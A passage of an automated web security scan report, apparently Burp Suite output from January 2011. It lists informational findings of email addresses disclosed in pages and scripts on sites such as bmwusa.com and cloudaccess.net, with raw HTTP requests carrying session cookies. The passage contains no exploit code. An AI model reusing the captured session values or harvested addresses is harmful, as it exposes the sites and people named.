Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:30 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=3985170442.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...
<a
href="mailto:classicscustomerservice@autotrader.com?subject=Page%20Not%20Found%20error%20reported%20by%20user">classicscustomerservice@autotrader.com</a>
...[SNIP]...
<input id="emailAddr" type="text" class="fields" name="udename!tkt_email"
value="youremail@address.com" maxlength="150"
onFocus="document.getElementById('emailAddr').value='';document.getElementById('emailAddr').style.color='#000';"/>
...[SNIP]...

24.150. http://www.autotraderclassics.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/x22

Issue detail

The following email addresses were disclosed in the response:

classicscustomerservice@autotrader.com
youremail@address.com

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:29 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=4203274250.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...
<a
href="mailto:classicscustomerservice@autotrader.com?subject=Page%20Not%20Found%20error%20reported%20by%20user">classicscustomerservice@autotrader.com</a>
...[SNIP]...
<input id="emailAddr" type="text" class="fields" name="udename!tkt_email"
value="youremail@address.com" maxlength="150"
onFocus="document.getElementById('emailAddr').value='';document.getElementById('emailAddr').style.color='#000';"/>
...[SNIP]...

24.151. http://www.autotraderstatic.com/inc/js/myatc/notifications.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderstatic.com
Path:	/inc/js/myatc/notifications.js

Issue detail

The following email address was disclosed in the response:

emailaddress@domain.com

Request

GET /inc/js/myatc/notifications.js HTTP/1.1
Host: www.autotraderstatic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: M7F1=CT;

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:13 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: application/x-javascript
Cache-Control: max-age=558284
Expires: Tue, 01 Feb 2011 01:27:27 GMT
Date: Tue, 25 Jan 2011 14:22:43 GMT
Content-Length: 9809
Connection: close

/*
Functions for MyATC messaging - please be aware that this effects both the Legacy Site and the JSF site (myatc_header_msg.jspf / .xhtml)
TODO:finish refactoring this && replace Prototype setStyle
...[SNIP]...
List.push('Please enter your password to save your new email address.');
}

else if (!isValidEmail(new_email)) {
errorMsgList.push('Please enter a valid email address format. (Example: emailaddress@domain.com)');
}

else if (new_email.toLowerCase() != confirm_email.toLowerCase()) {
errorMsgList.push('The email addresses entered do not match. Please double-check your email address and confir
...[SNIP]...

24.152. http://www.barelyfitz.com/projects/tabber/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barelyfitz.com
Path:	/projects/tabber/

Issue detail

The following email addresses were disclosed in the response:

info@barelyfitz.com
pat@barelyfitz.com

Request

GET /projects/tabber/ HTTP/1.1
Host: www.barelyfitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
Content-Length: 14750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML LANG="en">
<HEAD>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859
...[SNIP]...
<LINK REL="Made" HREF="mailto:info@barelyfitz.com"
TITLE="BarelyFitz Designs Feedback">
...[SNIP]...
<input type="hidden" name="business" value="pat@barelyfitz.com">
...[SNIP]...

24.153. http://www.barkerstores.com/soundings/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barkerstores.com
Path:	/soundings/

Issue detail

The following email address was disclosed in the response:

webmaster@personal-connections.com

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 14:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
Set-Cookie: chk_support=check; path=/
Set-Cookie: SOU_CustID=SOU13989; path=/
Set-Cookie: SOU_CartID=SOU-9E35923E-12511; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26388

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Soundings Online Catalog</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio.NET 7.0">
       <me
...[SNIP]...
<script language="JavaScript" src="pupdate.js">

/*
Popup calendar script by Sev Kotchnev (webmaster@personal-connections.com)
For full source code and installation instructions to this script
Visit http://www.dynamicdrive.com
*/

       </script>
...[SNIP]...

24.154. http://www.blip.tv/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/about/

Issue detail

The following email address was disclosed in the response:

aisserlis@rubenstein.com

Request

GET /about/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.155. https://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js
Content-Type: application/x-javascript
ETag: "982f96e670abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:06:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:22 GMT
Connection: keep-alive
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.156. https://www.bmwusa.com/JavaScript/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/JavaScript/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /JavaScript/s_code.js HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/JavaScript/s_code.js
Content-Type: application/x-javascript
ETag: "3c36fbe570abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:06:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:32 GMT
Connection: keep-alive
Content-Length: 44197

.../* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
D
...[SNIP]...
av()+q+(qs?qs:s."
+ "rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+ "lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^
...[SNIP]...

24.157. http://www.boattrader.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boattrader.com
Path:	/research/resources/

Issue detail

The following email address was disclosed in the response:

NatBoatTraderSales@dominionenterprises.com

Request

GET /research/resources/ HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.158. http://www.bymnews.com/scripts/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bymnews.com
Path:	/scripts/prototype.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /scripts/prototype.js HTTP/1.1
Host: www.bymnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:15:20 GMT
Server: Apache
Last-Modified: Fri, 11 Apr 2008 06:06:41 GMT
ETag: "628995d-b9f3-44a92bcdb1e40"
Accept-Ranges: bytes
Content-Length: 47603
Connection: close
Content-Type: application/javascript

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff
* against the source tree
...[SNIP]...

24.159. http://www.cloudaccess.net/cloudaccess-partner-program.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/cloudaccess-partner-program.html

Issue detail

The following email address was disclosed in the response:

garybrooks@cloudaccess.net

Request

Response

24.160. http://www.cloudaccess.net/contact-us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/contact-us.html

Issue detail

The following email address was disclosed in the response:

sales@cloudaccess.net

Request

Response

24.161. http://www.cloudaccess.net/contact-us/474.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/contact-us/474.html

Issue detail

The following email address was disclosed in the response:

sales@cloudaccess.net

Request

Response

24.162. http://www.cloudaccess.net/investor-relations.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/investor-relations.html

Issue detail

The following email address was disclosed in the response:

ceo@cloudaccess.net

Request

Response

24.163. http://www.cloudaccess.net/plugins/system/rokbox/rokbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/plugins/system/rokbox/rokbox.js

Issue detail

The following email address was disclosed in the response:

djamil@rockettheme.com

Request

GET /plugins/system/rokbox/rokbox.js HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Referer: http://www.cloudaccess.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:04 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Tue, 02 Mar 2010 15:43:55 GMT
ETag: "b064f-4f34-480d33bb4c4c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 20276

/**
* RokBox - Pops up all sort of media types, html, images, videos, audio, iframes.
*
* @version        1.3
*
* @author        Djamil Legato <djamil@rockettheme.com>
* @copyright    Andy Miller @ Rocketthe
...[SNIP]...

24.164. http://www.cloudaccess.net/trial.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/trial.html

Issue detail

The following email address was disclosed in the response:

demosupport@cloudaccess.net

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Tue, 03 Aug 2010 04:44:41 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...
<a href="mailto:demosupport@cloudaccess.net">demosupport@cloudaccess.net</a>
...[SNIP]...

24.165. http://www.commercialtrucktrader.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commercialtrucktrader.com
Path:	/sell/

Issue detail

The following email addresses were disclosed in the response:

customerservice@commercialtrucktrader.com
webmaster@commercialtrucktrader.com

Request

GET /sell/ HTTP/1.1
Host: www.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 99484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Sell Your New or Used Commercial Truck and Trailer - CommercialTruckTrader.com</title>

...[SNIP]...
<a href="mailto:customerservice@commercialtrucktrader.com">customerservice@commercialtrucktrader.com</a> or <a href="mailto:webmaster@commercialtrucktrader.com">webmaster@commercialtrucktrader.com</a>
...[SNIP]...

24.166. http://www.cycletrader.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cycletrader.com
Path:	/research/resources/

Issue detail

The following email address was disclosed in the response:

advertising@cycletrader.com

Request

GET /research/resources/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.167. http://www.cycletrader.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cycletrader.com
Path:	/sell/

Issue detail

The following email address was disclosed in the response:

customerservice@cycletrader.com

Request

GET /sell/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.168. http://www.dedipower.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dedipower.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

info@dedipower.com
sales@dedipower.com.hk

Request

GET / HTTP/1.1
Host: www.dedipower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: symfony=6hvnhit5lq2d9qcjo8guti4nu0; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a href="mailto:info@dedipower.com">info@dedipower.com</a>
...[SNIP]...
<a href="mailto:sales@dedipower.com.hk">sales@dedipower.com.hk</a>
...[SNIP]...

24.169. http://www.dinoex.de/unix-connect.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dinoex.de
Path:	/unix-connect.html

Issue detail

The following email addresses were disclosed in the response:

unix-connect-users@lists.sourceforge.net
unix-connect@mailinglisten.im-netz.de

Request

GET /unix-connect.html HTTP/1.1
Host: www.dinoex.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "484445699"
Last-Modified: Fri, 06 Mar 2009 12:01:05 GMT
Content-Length: 3634
Connection: close
Date: Mon, 24 Jan 2011 16:04:51 GMT
Server: lighttpd/1.4.28

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="generator" content="HTML Tidy, see www.w3.org">
<meta http-equiv="Conte
...[SNIP]...
onnect-Support, auf der Hilfestellungen gegeben, Fehler
gemeldet, Patches verschickt, neue Versionen angek.ndigt und die weitere Programmentwicklung besprochen werden.
Die Adresse der Mailingliste ist unix-connect@mailinglisten.im-netz.de, f.r An- und Abmeldungen schreiben Sie
bitte an <a href=
"mailto:unix-connect-users@lists.sourceforge.net">unix-connect-users@lists.sourceforge.net</a>
...[SNIP]...

24.170. http://www.directstartv.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.directstartv.com
Path:	/

Issue detail

The following email address was disclosed in the response:

comments@DirectStarTV.com

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Mon, 23-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<meta http-equiv="reply-to" content="comments@DirectStarTV.com" />
...[SNIP]...

24.171. http://www.dominionenterprises.com/main/do/Privacy_Policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dominionenterprises.com
Path:	/main/do/Privacy_Policy

Issue detail

The following email address was disclosed in the response:

IPadministrator@dominionenterprises.com

Request

GET /main/do/Privacy_Policy HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.172. http://www.dominionenterprises.com/main/do/Terms_of_Use previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dominionenterprises.com
Path:	/main/do/Terms_of_Use

Issue detail

The following email address was disclosed in the response:

IPadministrator@dominionenterprises.com

Request

GET /main/do/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.173. http://www.ebayinc.com/content/press_release/ebay_selects_joomla_open_source_to_foste previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebayinc.com
Path:	/content/press_release/ebay_selects_joomla_open_source_to_foste

Issue detail

The following email addresses were disclosed in the response:

acoffee@ebay.com
press@ebay.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:24 GMT
Set-Cookie: JSESSIONID=56B7E2F4F643F8C3234B643523676F33; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Length: 19418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<a href="mailto:press@ebay.com">press@ebay.com</a>
...[SNIP]...
<a href="mailto:acoffee@ebay.com">acoffee@ebay.com</a>
...[SNIP]...

24.174. http://www.employmentguide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.employmentguide.com
Path:	/

Issue detail

The following email address was disclosed in the response:

custserv@traderonline.com

Request

GET / HTTP/1.1
Host: www.employmentguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.175. http://www.equipmenttraderonline.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.equipmenttraderonline.com
Path:	/research/resources/

Issue detail

The following email address was disclosed in the response:

sales@equipmenttraderonline.com

Request

GET /research/resources/ HTTP/1.1
Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.176. http://www.equipmenttraderonline.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.equipmenttraderonline.com
Path:	/sell/

Issue detail

The following email addresses were disclosed in the response:

customerservice@equipmenttraderonline.com
webmaster@equipmenttraderonline.com

Request

GET /sell/ HTTP/1.1
Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:22 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 25721


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sell your new or used equipment - EquipmentTraderOnline.com</title>
<meta name="descri
...[SNIP]...
<a href="mailto:customerservice@equipmenttraderonline.com" title="Email customer service">customerservice@equipmenttraderonline.com</a> or <a href="mailto:webmaster@equipmenttraderonline.com" title="Email the site administrator">webmaster@equipmenttraderonline.com</a>
...[SNIP]...

24.177. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eraser.ee
Path:	/uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The following email address was disclosed in the response:

eraser@eraser.ee

Request

GET /uudised/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2fa25d95fd31dc38873e1bc08d1d659=da81efe2eb9fa0e02e77a8fa6697e953; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
